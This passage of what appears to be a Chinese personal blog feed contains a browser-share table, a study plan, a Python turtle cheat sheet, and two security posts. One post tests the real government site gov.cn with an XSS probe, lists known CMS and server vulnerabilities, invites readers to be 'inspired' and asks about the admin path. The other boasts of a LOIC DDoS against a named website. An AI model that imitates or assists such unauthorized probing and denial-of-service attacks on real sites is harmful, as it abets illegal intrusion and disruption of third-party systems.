%</td></tr><tr><td align="left">8 月</td><td align="left">3.38 %</td><td align="left">1.21 %</td><td align="left">1.43 %</td><td align="left">0.74 %</td></tr><tr><td align="left">7 月</td><td align="left">3.16 %</td><td align="left">1.03 %</td><td align="left">1.37 %</td><td align="left">0.76 %</td></tr><tr><td align="left">6 月</td><td align="left">3.17 %</td><td align="left">1.15 %</td><td align="left">1.32 %</td><td align="left">0.70 %</td></tr><tr><td align="left">5 月</td><td align="left">2.64 %</td><td align="left">1.12 %</td><td align="left">1.04 %</td><td align="left">0.48 %</td></tr><tr><td align="left">4 月</td><td align="left">2.24 %</td><td align="left">1.06 %</td><td align="left">0.97 %</td><td align="left">0.21 %</td></tr><tr><td align="left">3 月</td><td align="left">2.26 %</td><td align="left">1.11 %</td><td align="left">0.96 %</td><td align="left">0.19 %</td></tr><tr><td align="left">2 月</td><td align="left">2.17 %</td><td align="left">1.06 %</td><td align="left">0.91 %</td><td align="left">0.20 %</td></tr><tr><td align="left">1 月</td><td align="left">2.18 %</td><td align="left">1.07 %</td><td align="left">0.90 %</td><td align="left">0.21 %</td></tr><tr><td align="left">2012</td><td align="left">总计</td><td align="left">iOS *</td><td align="left">Android（安卓）</td><td align="left">其他</td></tr><tr><td align="left">12 月</td><td align="left">2.19 %</td><td align="left">1.05 %</td><td align="left">0.90 %</td><td align="left">0.24 %</td></tr><tr><td align="left">11 月</td><td align="left">1.97 %</td><td align="left">1.00 %</td><td align="left">0.77 %</td><td align="left">0.20 %</td></tr><tr><td align="left">10 月</td><td align="left">1.84 %</td><td align="left">0.94 %</td><td align="left">0.70 %</td><td align="left">0.20 %</td></tr><tr><td align="left">9 月</td><td align="left">1.78 %</td><td align="left">0.89 %</td><td align="left">0.68 %</td><td align="left">0.21 %</td></tr><tr><td align="left">8 月</td><td align="left">1.79 %</td><td align="left">0.91 %</td><td align="left">0.66 %</td><td align="left">0.22 %</td></tr><tr><td align="left">7 月</td><td align="left">1.71 %</td><td align="left">0.90 %</td><td align="left">0.59 %</td><td align="left">0.22 %</td></tr><tr><td align="left">6 月</td><td align="left">1.63 %</td><td align="left">0.90 %</td><td align="left">0.52 %</td><td align="left">0.21 %</td></tr><tr><td align="left">5 月</td><td align="left">1.57 %</td><td align="left">0.88 %</td><td align="left">0.50 %</td><td align="left">0.19 %</td></tr><tr><td align="left">4 月</td><td align="left">1.47 %</td><td align="left">0.83 %</td><td align="left">0.45 %</td><td align="left">0.19 %</td></tr><tr><td align="left">3 月</td><td align="left">1.40 %</td><td align="left">0.78 %</td><td align="left">0.44 %</td><td align="left">0.18 %</td></tr><tr><td align="left">2 月</td><td align="left">1.27 %</td><td align="left">0.71 %</td><td align="left">0.39 %</td><td align="left">0.17 %</td></tr><tr><td align="left">1 月</td><td align="left">1.25 %</td><td align="left">0.70 %</td><td align="left">0.38 %</td><td align="left">0.17 %</td></tr></tbody></table><table><thead><tr><th align="left">2011</th><th align="left">总计</th><th align="left">iPhone</th><th align="left">iPad</th><th align="left">iPod</th><th align="left">Android（安卓）</th><th align="left">其他</th></tr></thead><tbody><tr><td align="left">12 月</td><td align="left">1.17 %</td><td align="left">0.20 %</td><td align="left">0.39 %</td><td align="left">0.04 %</td><td align="left">0.35 %</td><td align="left">0.19 %</td></tr><tr><td align="left">11 月</td><td align="left">1.02 %</td><td align="left">0.19 %</td><td align="left">0.36 %</td><td align="left">0.04 %</td><td align="left">0.30 %</td><td align="left">0.13 %</td></tr><tr><td align="left">10 月</td><td align="left">0.96 %</td><td align="left">0.19 %</td><td align="left">0.33 %</td><td align="left">0.04 %</td><td align="left">0.28 %</td><td align="left">0.12 %</td></tr><tr><td align="left">9 月</td><td align="left">0.89 %</td><td align="left">0.17 %</td><td align="left">0.30 %</td><td align="left">0.04 %</td><td align="left">0.25 %</td><td align="left">0.13 %</td></tr><tr><td align="left">8 月</td><td align="left">0.91 %</td><td align="left">0.19 %</td><td align="left">0.30 %</td><td align="left">0.05 %</td><td align="left">0.24 %</td><td align="left">0.13 %</td></tr><tr><td align="left">7 月</td><td align="left">0.95 %</td><td align="left">0.20 %</td><td align="left">0.31 %</td><td align="left">0.06 %</td><td align="left">0.24 %</td><td align="left">0.14 %</td></tr><tr><td align="left">6 月</td><td align="left">0.87 %</td><td align="left">0.19 %</td><td align="left">0.30 %</td><td align="left">0.05 %</td><td align="left">0.21 %</td><td align="left">0.12 %</td></tr><tr><td align="left">5 月</td><td align="left">0.80 %</td><td align="left">0.20 %</td><td align="left">0.25 %</td><td align="left">0.05 %</td><td align="left">0.19 %</td><td align="left">0.11 %</td></tr><tr><td align="left">4 月</td><td align="left">0.78 %</td><td align="left">0.20 %</td><td align="left">0.25 %</td><td align="left">0.05 %</td><td align="left">0.18 %</td><td align="left">0.10 %</td></tr><tr><td align="left">3 月</td><td align="left">0.70 %</td><td align="left">0.18 %</td><td align="left">0.21 %</td><td align="left">0.06 %</td><td align="left">0.16 %</td><td align="left">0.09 %</td></tr><tr><td align="left">2 月</td><td align="left">0.66 %</td><td align="left">0.18 %</td><td align="left">0.19 %</td><td align="left">0.06 %</td><td align="left">0.14 %</td><td align="left">0.09 %</td></tr><tr><td align="left">1 月</td><td align="left">0.65 %</td><td align="left">0.18 %</td><td align="left">0.20 %</td><td align="left">0.06 %</td><td align="left">0.13 %</td><td align="left">0.08 %</td></tr></tbody></table><p>* iOS 主要指的是苹果移动设备（如 iPhone、iPad 和 iPod）的操作系统。</p><h2 id="Internet-Explorer-浏览器"><a href="#Internet-Explorer-浏览器" class="headerlink" title="Internet Explorer 浏览器"></a>Internet Explorer 浏览器</h2><p><img src="https://www.runoob.com/images/pic_ie_large.jpg" alt="Internet Explorer"></p><p>Internet Explorer 浏览器，简称 IE 浏览器，是微软公司（Microsoft）发布的一款免费的 web 浏览器。</p><h2 id="Firefox-浏览器"><a href="#Firefox-浏览器" class="headerlink" title="Firefox 浏览器"></a>Firefox 浏览器</h2><p><img src="https://www.runoob.com/images/pic_firefox_large.jpg" alt="Firefox"></p><p>Firefox 浏览器，中文名”火狐浏览器”，是来自 Mozilla 的一款免费的开源 web 浏览器。</p><p>Firefox 发布于 2004 年，也是当今最流行的浏览器之一。</p><p>Firefox 可以在 Windows、Mac OS X、Linux 和 Android 上运行。</p><p><a href="http://www.mozilla.org/products/firefox/">下载 Firefox</a></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;1-0-问&quot;&gt;&lt;a href=&quot;#1-0-问&quot; class=&quot;headerlink&quot; title=&quot;1.0 问&quot;&gt;&lt;/a&gt;1.0 问&lt;/h1&gt;&lt;p&gt;下面是来自A稽的朋友提交的问题：&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://imgtu.com/i/7cJ34</summary>
      
    
    
    
    <category term="问答" scheme="http://example.com/categories/%E9%97%AE%E7%AD%94/"/>
    
    
    <category term="日常" scheme="http://example.com/tags/%E6%97%A5%E5%B8%B8/"/>
    
  </entry>
  
  <entry>
    <title>2022年寒假计划清单</title>
    <link href="http://example.com/2022/01/20/%E5%AF%92%E5%81%87%E8%AE%A1%E5%88%92%E8%A1%A8/"/>
    <id>http://example.com/2022/01/20/%E5%AF%92%E5%81%87%E8%AE%A1%E5%88%92%E8%A1%A8/</id>
    <published>2022-01-20T04:00:00.000Z</published>
    <updated>2022-01-20T04:02:14.403Z</updated>
    
    <content type="html"><![CDATA[<h1 id="2022年寒假计划清单"><a href="#2022年寒假计划清单" class="headerlink" title="2022年寒假计划清单"></a>2022年寒假计划清单</h1><h2 id="一月份"><a href="#一月份" class="headerlink" title="一月份"></a>一月份</h2><ul><li><p>1.20 </p><p>1.语数英物《寒假星生活》各两天</p><p>2.预习数学一个课时 </p><p>3.背默一课语文古诗/词/文</p><p>4.背两个模块英语单词</p></li><li><p>1.21</p><p>1.语数英物《寒假星生活》各两天</p><p>2.预习数学一个课时</p><p>3.背默一课语文古诗/词/文</p><p>4.背两个模块英语单词</p></li><li><p>1.22</p><p>1.语数英物《寒假星生活》各两天</p><p>2.预习数学一个课时</p><p>3.背默一课语文古诗/词/文</p><p>4.背两个模块英语单词</p></li><li><p>1.23</p><p>1.语数英物《寒假星生活》各两天</p><p>2.预习数学一个课时</p><p>3.背默一课语文古诗/词/文</p><p>4.背两个模块英语单词</p></li><li><p>1.24</p></li></ul><p>​       1.语数英物《寒假星生活》各两天</p><p>​       2.预习数学一个课时</p><p>​       3.背默一课语文古诗/词/文</p><p>​       4.背两个模块英语单词</p><ul><li><p>1.25</p><p>1.语数英物《寒假星生活》各两天</p><p>2.预习数学一个课时</p><p>3.背默一课语文古诗/词/文</p><p>4.背一课英语对话</p></li><li><p>1.26</p><p>1.语数英物《寒假星生活》各两天</p><p>2.背默一课语文古诗/词/文</p><p>3.背一课英语对话</p><p>4.预习物理一个课时</p></li><li><p>1.27</p><p>1.语数英物《寒假星生活》各两天</p><p>2.背默一课语文古诗/词/文</p><p>3.背一课英语对话</p><p>4.预习物理一个课时</p></li><li><p>1.28</p><p>1.语数英物《寒假星生活》各两天</p><p>2.背一课英语对话</p><p>3.预习物理一个课时</p></li><li><p>1.29</p><p>1.语数英物《寒假星生活》各两天</p><p>2.背一课英语对话</p><p>3.预习物理一个课时</p></li><li><p>1.30</p><p><strong>1.完成英语实践作业</strong></p><p>2.预习数学一个课时 </p><p>3.预习物理一个课时</p></li><li><p>1.31</p><p>1.写数学练习题</p><p>2.预习物理一个课时</p><p>3.预习英语一个模块</p></li></ul><blockquote><p>*： 一月份每天都要完成：阅读《傅雷家书》不少于三十分钟；英语完型填空和阅读短文一篇</p></blockquote><h2 id="二月份"><a href="#二月份" class="headerlink" title="二月份"></a>二月份</h2><ul><li><p>2.1</p><p>1.写数学练习题</p><p>2.预习物理一个课时</p><p>3.预习英语一个模块</p></li><li><p>2.2</p><p>1.写数学练习题</p><p>2.预习物理一个课时</p><p>3.预习英语一个模块</p></li><li><p>2.3</p><p>1.写数学练习题</p><p>2.预习物理一个课时</p><p>3.预习英语一个模块</p></li><li><p>2.4</p><p><strong>1.完成政治实践作业</strong></p><p>2.预习物理一个课时</p><p>3.预习英语一个模块</p></li><li><p>2.5</p><p><strong>1.完成历史实践作业</strong></p><p>2.预习物理一个课时</p><p>3.预习英语一个模块</p></li><li><p>2.6</p><p><strong>1.完成地理实践作业</strong></p><p>2.预习物理一个课时</p><p>3.预习英语一个模块</p></li><li><p>2.7</p><p><strong>1.完成生物实践作业</strong></p><p>2.预习物理一个课时</p><p>3.预习英语一个模块</p></li><li><p>2.8</p><p><strong>1.完成数学实践作业</strong></p><p>2.预习物理一个课时</p><p>3.预习英语一个模块</p></li><li><p>2.9</p><p>2.预习物理一个课时</p><p>3.预习英语一个模块</p></li><li><p>2.10</p><p>2.预习物理一个课时</p><p>3.预习英语一个模块</p></li><li><p>2.11</p><p>2.预习物理一个课时</p><p>3.预习英语一个模块</p></li><li><p>2.12</p><p>2.预习物理一个课时</p><p>3.预习英语一个模块</p></li><li><p>2.13</p><p>无</p></li><li><p>2.14</p><p>无</p></li><li><p>2.15</p></li></ul><p>​       无</p><blockquote><p>*:寒假期间每天都须进行体育锻炼；其中二月份须完成每天阅读《钢铁是怎样炼成的》不少于40分钟</p></blockquote>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;2022年寒假计划清单&quot;&gt;&lt;a href=&quot;#2022年寒假计划清单&quot; class=&quot;headerlink&quot; title=&quot;2022年寒假计划清单&quot;&gt;&lt;/a&gt;2022年寒假计划清单&lt;/h1&gt;&lt;h2 id=&quot;一月份&quot;&gt;&lt;a href=&quot;#一月份&quot; class=&quot;he</summary>
      
    
    
    
    <category term="动态" scheme="http://example.com/categories/%E5%8A%A8%E6%80%81/"/>
    
    
    <category term="日常" scheme="http://example.com/tags/%E6%97%A5%E5%B8%B8/"/>
    
  </entry>
  
  <entry>
    <title>中国政府网站是否存在xss漏洞</title>
    <link href="http://example.com/2022/01/19/%E4%B8%AD%E5%9B%BD%E6%94%BF%E5%BA%9C%E7%BD%91%E7%AB%99%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8xss%E6%BC%8F%E6%B4%9E/"/>
    <id>http://example.com/2022/01/19/%E4%B8%AD%E5%9B%BD%E6%94%BF%E5%BA%9C%E7%BD%91%E7%AB%99%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8xss%E6%BC%8F%E6%B4%9E/</id>
    <published>2022-01-19T13:06:16.000Z</published>
    <updated>2022-01-19T13:27:35.016Z</updated>
    
    <content type="html"><![CDATA[<h1 id="1-0-问"><a href="#1-0-问" class="headerlink" title="1.0 问"></a>1.0 问</h1><p><a href="https://imgtu.com/i/7sfia8"><img src="https://s4.ax1x.com/2022/01/19/7sfia8.png" alt="7sfia8.png"></a></p><h1 id="2-0-答"><a href="#2-0-答" class="headerlink" title="2.0 答"></a>2.0 答</h1><p>攻击中国政府网站在2021年anonymous组织有过a，但是呢在中国是属于犯罪行为，如果想了解的话底下有一点技巧，希望能启发到您</p><h1 id="3-0-过程"><a href="#3-0-过程" class="headerlink" title="3.0 过程"></a>3.0 过程</h1><p><strong>1.首先</strong></p><p><a href="https://imgtu.com/i/7sfwdK"><img src="https://s4.ax1x.com/2022/01/19/7sfwdK.png" alt="7sfwdK.png"></a></p><p>我们来到中国政府网站：<a href="http://www.gov.cn/">www.gov.cn</a></p><p>OK，下一步检测是否存在xss漏洞（跨站脚本攻击）</p><p><a href="https://imgtu.com/i/7sfoWQ"><img src="https://s4.ax1x.com/2022/01/19/7sfoWQ.png" alt="7sfoWQ.png"></a></p><p>请注意看右上角搜索框中的</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="string">&#x27;xss&#x27;</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure><p>这是一个简单的xss脚本，常用来测试网站的xss漏洞，当然这种小伎俩gov这些政府网站肯定可以过滤，那么我们来看一下过滤原理：</p><p>！：提示，这里我们要看提交代码后的url</p><p><a href="https://imgtu.com/i/7shd6s"><img src="https://s4.ax1x.com/2022/01/19/7shd6s.png" alt="7shd6s.png"></a></p><p>看到了没？alert后面的恶意代码已经被过滤</p><blockquote><p>凡是xss恶意代码，只能过滤、转换，却不能消除，懂我的意思不？</p><p>（不可以根除）</p></blockquote><p><strong>2.其次</strong></p><p>我们来找找旁站以及其它注入，不过从zoomeye中我们就发现了以下漏洞：</p><p><strong>dedecms</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-99413">994132021-12-15高危DedeCMS XML注入漏洞(CVE-2018-16784)</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-99392">993922021-11-24高危Dedecms 身份绕过漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-99363">993632021-10-01高危DedeCMS 未授权RCE漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-98044">980442019-08-02高危DedeCMS 后台存在SSRF漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-97822">978222019-02-25低危dedecms后台getshell</a></p><p><strong>apache tomcat</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-99316">993162021-07-27中危Apache Tomcat HTTP请求走私(CVE-2021-33037)</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-99034">990342020-11-04高危Apache Tomcat拒绝服务漏洞（CVE-2020-13935）</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-98234">982342020-05-21高危Apache Tomcat session持久化远程代码执行漏洞(CVE-2020-9484)</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-98134">981342020-02-20高危Apache Tomcat Ajp协议文件包含漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-97905">979052019-04-12高危Apache Tomcat Remote Code Execution on Windows(CVE-2019-0…</a></p><p><strong>phpmyadmin</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-97731">977312018-12-18高危PHPMyAdmin multiple vulnerabilities</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-97355">973552018-06-21高危phpmyadmin4.8.1后台getshell</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-92512">925122016-11-02高危phpMyAdmin dbase extension 远程代码执行漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-92339">923392016-08-25高危phpmyadmin2.8.0.3任意文件包含漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-92209">922092016-08-01高危PhpMyAdmin 4.3.0—4.6.2 授权用户远程命令执行漏洞</a></p><p><strong>http</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-99364">993642021-10-08高危Apache HTTPd 多个路径穿越与命令执行漏洞（CVE-2021-41773 CVE-2021-42013）…</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-97900">979002019-04-10高危CVE-2019-0211 Apache Root Privilege Escalation</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-97633">976332018-10-30高危ACME Mini_httpd组件任意文件读取漏洞(CVE-2018-18778)</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-96556">965562017-09-20高危Apps industrial OT over Server: Anti-Web Local File Incl…</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-96555">965552017-09-20高危Apps industrial OT over Server: Anti-Web Remote Command …</a></p><p><strong>jcms(hanweb)</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-92277">922772016-08-11高危大汉jcms /jcms/jcms_files/jcms1/web1/site/module/comment/op…</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-91530">915302016-05-12高危大汉JCMS /xxgk/workflow/design/que_model.jsp 多个参数SQL注入</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-91529">915292016-05-12高危大汉JCMS /short_message/que_contact.jsp 等3处SQL注入</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-91202">912022016-03-29高危大汉 (JCMS)的opr_getcount.jsp的两处注入（</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-91201">912012016-03-29高危大汉JCMS政务系统 opr_ballot.jsp 参数c_uuid SQL注入漏洞</a></p><p><strong>kangle</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-90676">906762016-01-28中危Kangle虚拟主机本地文件包含漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-90674">906742016-01-28中危kangle web server目录遍历漏洞</a></p><p><strong>apache httpd</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-99364">993642021-10-08高危Apache HTTPd 多个路径穿越与命令执行漏洞（CVE-2021-41773 CVE-2021-42013）…</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-97900">979002019-04-10高危CVE-2019-0211 Apache Root Privilege Escalation</a></p><p><strong>nginx</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-96273">962732017-07-13高危Nginx Remote Integer Overflow Vulnerability(CVE-2017-7529…</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-92538">925382016-11-16高危Nginx 权限提升漏洞 (Debian、Ubuntu发行版)</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-89321">893212015-09-06中危nginx 0.5.6 - 1.7.4 SSL session vulnerable</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-62014">620142014-03-31高危Nginx SPDY缓冲区溢出漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-62529">625292013-12-01高危Nginx Blank Null Byte 代码执行漏洞</a></p><p><strong>jsp</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-99287">992872021-07-07高危Jspxcms 后台RCE漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-98088">980882019-10-17高危jspxcms不安全解压getshell</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-89587">895872015-09-29中危JSPMyAdmin 1.1 SQL Injection, CSRF &amp; XSS漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-89387">893872015-09-09高危JSPMySQL Administrador CSRF &amp; XSS Vulnerabilities</a></p><p><strong>microsoft iis httpd</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-89233">892332015-07-01高危IIS 系列 Http.sys 处理 Range 整数溢出漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-62350">623502013-04-22高危IIS 7.5 解析错误 命令执行漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-60465">604652012-11-18高危Microsoft IIS 密码信息泄露漏洞（MS12-073)</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-60466">604662012-11-18高危Microsoft IIS FTP服务远程命令注入漏洞（MS12-073)</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-62289">622892012-07-12中危IIS &lt;7.5 8.3格式短文件名导致的信息泄漏</a></p><p><strong>wordpress</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-99431">994312022-01-10高危wordpress SQL注入漏洞（CVE-2022–21661）</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-99304">993042021-07-19高危woocommerce 插件 SQL注入漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-99235">992352021-04-28高危wordpress 5.7 授权XXE漏洞（CVE-2021-29447）</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-99166">991662021-03-25高危WordPress BuddyPress插件远程代码执行漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-99153">991532021-03-10高危WordPress The Plus Addons for Elementor插件身份验证绕过漏洞（CVE-202…</a></p><p><strong>qibocms</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-91590">915902016-05-18高危齐博CMS视频系统 showsp.php和list.php 两处SQL注入漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-91545">915452016-05-13中危齐博视频系统 video/member/special.php SQL注入漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-91496">914962016-05-09中危齐博视频系统 special.php 参数aids SQL注入漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-91367">913672016-04-23高危qibocms 地方门户系统zhuangxiu/list.php处注入</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-91272">912722016-04-07高危齐博CMS知道系统 zhidao/ask.php等4处SQL注入</a></p><p><strong>fckeditor</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-92521">925212016-11-05中危FCKEditor Core - (Editor ‘spellchecker.php’) Cross-Site S…</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-90176">901762015-12-24低危FCKeditor /spellchecker.php 页面绝对路径泄露</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-90142">901422015-12-21高危FCKeditor JSP版本 connector模块文件上传漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-90136">901362015-12-18高危FCKeditor 2.4.3 /fckeditor/editor/filemanager/upload/php…</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-89450">894502015-09-17高危网站通 CMS FCKeditor 组件文件上传漏洞</a></p><p><strong>discuz!</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-98045">980452019-08-02中危dz x3.4 后台任意文件读取可导致任意用户密码重置或getshell</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-98019">980192019-07-11高危Discuz!ML V3.X 代码注入</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-97815">978152019-02-19高危Discuz 3.4 越权登陆漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-97709">977092018-12-10高危DiscuzX 两处 SSRF 挖掘及利用</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-97704">977042018-12-05高危Discuz x3.4前台SSRF</a></p><p><strong>kesioncms</strong></p><p><a href="https://www.seebug.org/vuldb/ssvid-91027">910272016-03-14中危KesionCMS ASP版 /item/?c-5,key-1.html SQL注入漏洞</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-94931">949312016-02-24高危KesionCMS官网大马一枚</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-89343">893432015-09-07高危KesionCMS V2.5 /plus/ueditor/Uploader.cs 文件上传</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-94930">949302015-07-10中危KesionIMalv2.5逻辑漏洞（DEMO演示）</a></p><p><a href="https://www.seebug.org/vuldb/ssvid-94906">949062015-06-03高危KesionIMALL 注册处存在cookie 注入</a></p><h1 id="3-0-总结"><a href="#3-0-总结" class="headerlink" title="3.0 总结"></a>3.0 总结</h1><p>即便是中国政府网站也存在大量漏洞，没有无懈可击的网站，或许只是没有发掘到其本质。</p><p><del>有哪位大佬能猜到中国政府网站后台目录吗？</del></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;1-0-问&quot;&gt;&lt;a href=&quot;#1-0-问&quot; class=&quot;headerlink&quot; title=&quot;1.0 问&quot;&gt;&lt;/a&gt;1.0 问&lt;/h1&gt;&lt;p&gt;&lt;a href=&quot;https://imgtu.com/i/7sfia8&quot;&gt;&lt;img src=&quot;https://s4.</summary>
      
    
    
    
    <category term="问答" scheme="http://example.com/categories/%E9%97%AE%E7%AD%94/"/>
    
    
    <category term="xss" scheme="http://example.com/tags/xss/"/>
    
  </entry>
  
  <entry>
    <title>ddos攻击av网站</title>
    <link href="http://example.com/2022/01/17/ddos%E6%94%BB%E5%87%BBav%E7%BD%91%E7%AB%99/"/>
    <id>http://example.com/2022/01/17/ddos%E6%94%BB%E5%87%BBav%E7%BD%91%E7%AB%99/</id>
    <published>2022-01-17T09:15:17.000Z</published>
    <updated>2022-01-19T13:32:34.647Z</updated>
    
    <content type="html"><![CDATA[<h1 id="1-0-图片"><a href="#1-0-图片" class="headerlink" title="1.0 图片"></a>1.0 图片</h1><p><strong>二话不说，上loic</strong></p><p><img src="https://s2.loli.net/2022/01/17/j1M6CXpRfim2b8u.png" alt="2345截图20220117171316.png"></p><p>众所周知，很多人被名叫ca*yu.cc之类的网站骚扰，该网站已发现大量成年人内容，只适合杨春运等成年人观看</p><p><strong>Q：就是一个这样的网站，就把ta黑了？</strong></p><p><strong>A：除此之外，该网站还在传播各种博彩广告，影响很大</strong></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;1-0-图片&quot;&gt;&lt;a href=&quot;#1-0-图片&quot; class=&quot;headerlink&quot; title=&quot;1.0 图片&quot;&gt;&lt;/a&gt;1.0 图片&lt;/h1&gt;&lt;p&gt;&lt;strong&gt;二话不说，上loic&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://s</summary>
      
    
    
    
    <category term="动态" scheme="http://example.com/categories/%E5%8A%A8%E6%80%81/"/>
    
    
    <category term="ddos" scheme="http://example.com/tags/ddos/"/>
    
  </entry>
  
  <entry>
    <title>python的turtle库</title>
    <link href="http://example.com/2022/01/16/python%E7%9A%84turtle%E5%BA%93/"/>
    <id>http://example.com/2022/01/16/python%E7%9A%84turtle%E5%BA%93/</id>
    <published>2022-01-16T04:40:26.000Z</published>
    <updated>2022-01-16T04:57:36.653Z</updated>
    
    <content type="html"><![CDATA[<h1 id="0-1-导言"><a href="#0-1-导言" class="headerlink" title="0.1 导言"></a>0.1 导言</h1><p>python是一个简单易懂的语言，并且有一个非常有趣的库—-turtle库，它可以帮你绘画，本期博客我来归纳一下常用的绘画代码，非常好学，请大家仔细听</p><h1 id="0-2-建议"><a href="#0-2-建议" class="headerlink" title="0.2 建议"></a>0.2 建议</h1><p>建议使用pycharm，虽然内存高了点，但写起python比文本文档好</p><h1 id="1-0-代码"><a href="#1-0-代码" class="headerlink" title="1.0 代码"></a>1.0 代码</h1><blockquote><p style="color:blue;font-size:large">海龟动作</p><blockquote><p><strong>移动和绘制</strong></p><blockquote><p>forward() | fd() 前进<br>backward() | bk() | back() 后退<br>right() | rt() 右转<br>left() | lt() 左转<br>goto() | setpos() | setposition() 前往/定位<br>setx() 设置x坐标<br>sety() 设置y坐标<br>setheading() | seth() 设置朝向<br>home() 返回原点<br>circle() 画圆<br>dot() 画点<br>stamp() 印章<br>clearstamp() 清除印章<br>clearstamps() 清除多个印章<br>undo() 撤消<br>speed() 速度</p></blockquote><p><strong>获取海龟的状态</strong></p><blockquote><p>position() | pos() 位置<br>towards() 目标方向<br>xcor() x坐标<br>ycor() y坐标<br>heading() 朝向<br>distance() 距离</p></blockquote><p><strong>设置与度量单位</strong></p><blockquote><p>degrees() 角度<br>radians() 弧度</p></blockquote></blockquote><p style="color:blue;font-size:large">画笔控制</p><blockquote><p><strong>绘图状态</strong></p><p>pendown() | pd() | down() 画笔落下<br>penup() | pu() | up() 画笔抬起<br>pensize() | width() 画笔粗细<br>pen() 画笔<br>isdown() 画笔是否落下</p><p><strong>颜色控制</strong></p><p>color() 颜色<br>pencolor() 画笔颜色<br>fillcolor() 填充颜色</p><p><strong>填充</strong></p><p>filling() 是否填充<br>begin_fill() 开始填充<br>end_fill() 结束填充</p><p><strong>更多绘图控制</strong></p><p>reset() 重置<br>clear() 清空<br>write() 书写</p></blockquote></blockquote><h1 id="1-1-其它高级语句"><a href="#1-1-其它高级语句" class="headerlink" title="1.1 其它高级语句"></a>1.1 其它高级语句</h1><ul><li><p>海龟状态</p><p>可见性<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.showturtle"><code>showturtle()</code></a> | <a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.st"><code>st()</code></a> 显示海龟<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.hideturtle"><code>hideturtle()</code></a> | <a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.ht"><code>ht()</code></a> 隐藏海龟<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.isvisible"><code>isvisible()</code></a> 是否可见外观<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.shape"><code>shape()</code></a> 形状<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.resizemode"><code>resizemode()</code></a> 大小调整模式<a 